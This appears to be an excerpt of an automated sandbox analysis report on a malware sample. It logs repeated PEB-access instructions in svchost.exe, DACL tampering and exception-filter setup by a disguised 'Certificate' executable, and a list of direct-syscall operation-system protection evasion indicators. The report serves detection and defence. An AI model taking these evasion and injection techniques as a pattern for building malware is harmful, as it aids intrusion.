            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov eax, dword ptr fs:[00000030h]1_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov eax, dword ptr fs:[00000030h]1_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov eax, dword ptr fs:[00000030h]1_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315C073 mov eax, dword ptr fs:[00000030h]1_2_0315C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AD070 mov ecx, dword ptr fs:[00000030h]1_2_031AD070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B106E mov eax, dword ptr fs:[00000030h]1_2_031B106E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03135096 mov eax, dword ptr fs:[00000030h]1_2_03135096
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315D090 mov eax, dword ptr fs:[00000030h]1_2_0315D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315D090 mov eax, dword ptr fs:[00000030h]1_2_0315D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316909C mov eax, dword ptr fs:[00000030h]1_2_0316909C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313208A mov eax, dword ptr fs:[00000030h]1_2_0313208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BD080 mov eax, dword ptr fs:[00000030h]1_2_031BD080
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BD080 mov eax, dword ptr fs:[00000030h]1_2_031BD080
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312D08D mov eax, dword ptr fs:[00000030h]1_2_0312D08D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F60B8 mov eax, dword ptr fs:[00000030h]1_2_031F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F60B8 mov ecx, dword ptr fs:[00000030h]1_2_031F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C80A8 mov eax, dword ptr fs:[00000030h]1_2_031C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B20DE mov eax, dword ptr fs:[00000030h]1_2_031B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031590DB mov eax, dword ptr fs:[00000030h]1_2_031590DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov ecx, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov ecx, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov ecx, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov ecx, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AD0C0 mov eax, dword ptr fs:[00000030h]1_2_031AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AD0C0 mov eax, dword ptr fs:[00000030h]1_2_031AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312C0F0 mov eax, dword ptr fs:[00000030h]1_2_0312C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031720F0 mov ecx, dword ptr fs:[00000030h]1_2_031720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031550E4 mov eax, dword ptr fs:[00000030h]1_2_031550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031550E4 mov ecx, dword ptr fs:[00000030h]1_2_031550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0312A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032050D9 mov eax, dword ptr fs:[00000030h]1_2_032050D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031380E9 mov eax, dword ptr fs:[00000030h]1_2_031380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B60E0 mov eax, dword ptr fs:[00000030h]1_2_031B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130710 mov eax, dword ptr fs:[00000030h]1_2_03130710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03160710 mov eax, dword ptr fs:[00000030h]1_2_03160710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316F71F mov eax, dword ptr fs:[00000030h]1_2_0316F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316F71F mov eax, dword ptr fs:[00000030h]1_2_0316F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03137703 mov eax, dword ptr fs:[00000030h]1_2_03137703
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03135702 mov eax, dword ptr fs:[00000030h]1_2_03135702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03135702 mov eax, dword ptr fs:[00000030h]1_2_03135702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C700 mov eax, dword ptr fs:[00000030h]1_2_0316C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320B73C mov eax, dword ptr fs:[00000030h]1_2_0320B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320B73C mov eax, dword ptr fs:[00000030h]1_2_0320B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320B73C mov eax, dword ptr fs:[00000030h]1_2_0320B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320B73C mov eax, dword ptr fs:[00000030h]1_2_0320B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03129730 mov eax, dword ptr fs:[00000030h]1_2_03129730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03129730 mov eax, dword ptr fs:[00000030h]1_2_03129730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03165734 mov eax, dword ptr fs:[00000030h]1_2_03165734
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313973A mov eax, dword ptr fs:[00000030h]1_2_0313973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313973A mov eax, dword ptr fs:[00000030h]1_2_0313973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316273C mov eax, dword ptr fs:[00000030h]1_2_0316273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316273C mov ecx, dword ptr fs:[00000030h]1_2_0316273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316273C mov eax, dword ptr fs:[00000030h]1_2_0316273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AC730 mov eax, dword ptr fs:[00000030h]1_2_031AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EF72E mov eax, dword ptr fs:[00000030h]1_2_031EF72E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03133720 mov eax, dword ptr fs:[00000030h]1_2_03133720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314F720 mov eax, dword ptr fs:[00000030h]1_2_0314F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314F720 mov eax, dword ptr fs:[00000030h]1_2_0314F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314F720 mov eax, dword ptr fs:[00000030h]1_2_0314F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F972B mov eax, dword ptr fs:[00000030h]1_2_031F972B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C720 mov eax, dword ptr fs:[00000030h]1_2_0316C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C720 mov eax, dword ptr fs:[00000030h]1_2_0316C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130750 mov eax, dword ptr fs:[00000030h]1_2_03130750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BE75D mov eax, dword ptr fs:[00000030h]1_2_031BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172750 mov eax, dword ptr fs:[00000030h]1_2_03172750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172750 mov eax, dword ptr fs:[00000030h]1_2_03172750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B4755 mov eax, dword ptr fs:[00000030h]1_2_031B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03143740 mov eax, dword ptr fs:[00000030h]1_2_03143740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03143740 mov eax, dword ptr fs:[00000030h]1_2_03143740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03143740 mov eax, dword ptr fs:[00000030h]1_2_03143740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316674D mov esi, dword ptr fs:[00000030h]1_2_0316674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316674D mov eax, dword ptr fs:[00000030h]1_2_0316674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316674D mov eax, dword ptr fs:[00000030h]1_2_0316674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03138770 mov eax, dword ptr fs:[00000030h]1_2_03138770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03203749 mov eax, dword ptr fs:[00000030h]1_2_03203749
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312B765 mov eax, dword ptr fs:[00000030h]1_2_0312B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312B765 mov eax, dword ptr fs:[00000030h]1_2_0312B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312B765 mov eax, dword ptr fs:[00000030h]1_2_0312B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312B765 mov eax, dword ptr fs:[00000030h]1_2_0312B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EF78A mov eax, dword ptr fs:[00000030h]1_2_031EF78A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032037B6 mov eax, dword ptr fs:[00000030h]1_2_032037B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315D7B0 mov eax, dword ptr fs:[00000030h]1_2_0315D7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F7BA mov eax, dword ptr fs:[00000030h]1_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F7BA mov eax, dword ptr fs:[00000030h]1_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F7BA mov eax, dword ptr fs:[00000030h]1_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F7BA mov eax, dword ptr fs:[00000030h]1_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F7BA mov eax, dword ptr fs:[00000030h]1_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F7BA mov eax, dword ptr fs:[00000030h]1_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F7BA mov eax, dword ptr fs:[00000030h]1_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F7BA mov eax, dword ptr fs:[00000030h]1_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F7BA mov eax, dword ptr fs:[00000030h]1_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B97A9 mov eax, dword ptr fs:[00000030h]1_2_031B97A9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BF7AF mov eax, dword ptr fs:[00000030h]1_2_031BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BF7AF mov eax, dword ptr fs:[00000030h]1_2_031BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BF7AF mov eax, dword ptr fs:[00000030h]1_2_031BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BF7AF mov eax, dword ptr fs:[00000030h]1_2_031BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BF7AF mov eax, dword ptr fs:[00000030h]1_2_031BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031307AF mov eax, dword ptr fs:[00000030h]1_2_031307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313C7C0 mov eax, dword ptr fs:[00000030h]1_2_0313C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031357C0 mov eax, dword ptr fs:[00000030h]1_2_031357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031357C0 mov eax, dword ptr fs:[00000030h]1_2_031357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031357C0 mov eax, dword ptr fs:[00000030h]1_2_031357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B07C3 mov eax, dword ptr fs:[00000030h]1_2_031B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031347FB mov eax, dword ptr fs:[00000030h]1_2_031347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031347FB mov eax, dword ptr fs:[00000030h]1_2_031347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313D7E0 mov ecx, dword ptr fs:[00000030h]1_2_0313D7E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]1_2_031527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]1_2_031527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]1_2_031527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BE7E1 mov eax, dword ptr fs:[00000030h]1_2_031BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03133616 mov eax, dword ptr fs:[00000030h]1_2_03133616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03133616 mov eax, dword ptr fs:[00000030h]1_2_03133616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172619 mov eax, dword ptr fs:[00000030h]1_2_03172619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03161607 mov eax, dword ptr fs:[00000030h]1_2_03161607
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE609 mov eax, dword ptr fs:[00000030h]1_2_031AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316F603 mov eax, dword ptr fs:[00000030h]1_2_0316F603
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03205636 mov eax, dword ptr fs:[00000030h]1_2_03205636
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E627 mov eax, dword ptr fs:[00000030h]1_2_0314E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F626 mov eax, dword ptr fs:[00000030h]1_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F626 mov eax, dword ptr fs:[00000030h]1_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F626 mov eax, dword ptr fs:[00000030h]1_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F626 mov eax, dword ptr fs:[00000030h]1_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F626 mov eax, dword ptr fs:[00000030h]1_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F626 mov eax, dword ptr fs:[00000030h]1_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F626 mov eax, dword ptr fs:[00000030h]1_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F626 mov eax, dword ptr fs:[00000030h]1_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F626 mov eax, dword ptr fs:[00000030h]1_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03166620 mov eax, dword ptr fs:[00000030h]1_2_03166620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03168620 mov eax, dword ptr fs:[00000030h]1_2_03168620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313262C mov eax, dword ptr fs:[00000030h]1_2_0313262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314C640 mov eax, dword ptr fs:[00000030h]1_2_0314C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03162674 mov eax, dword ptr fs:[00000030h]1_2_03162674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F866E mov eax, dword ptr fs:[00000030h]1_2_031F866E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031F866E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316A660 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316A660 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03169660 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03169660 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03134690 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03134690 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B368C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B368C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B368C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B368C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031276B2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031276B2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031276B2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031666B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316C6A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0312D6AA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0312D6AA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316A6C7 mov ebx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316A6C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313B6C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313B6C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313B6C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313B6C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_0087A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_00868189 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_008681AC SetUnhandledExceptionFilter,UnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtOpenKeyEx: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtQueryValueKey: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
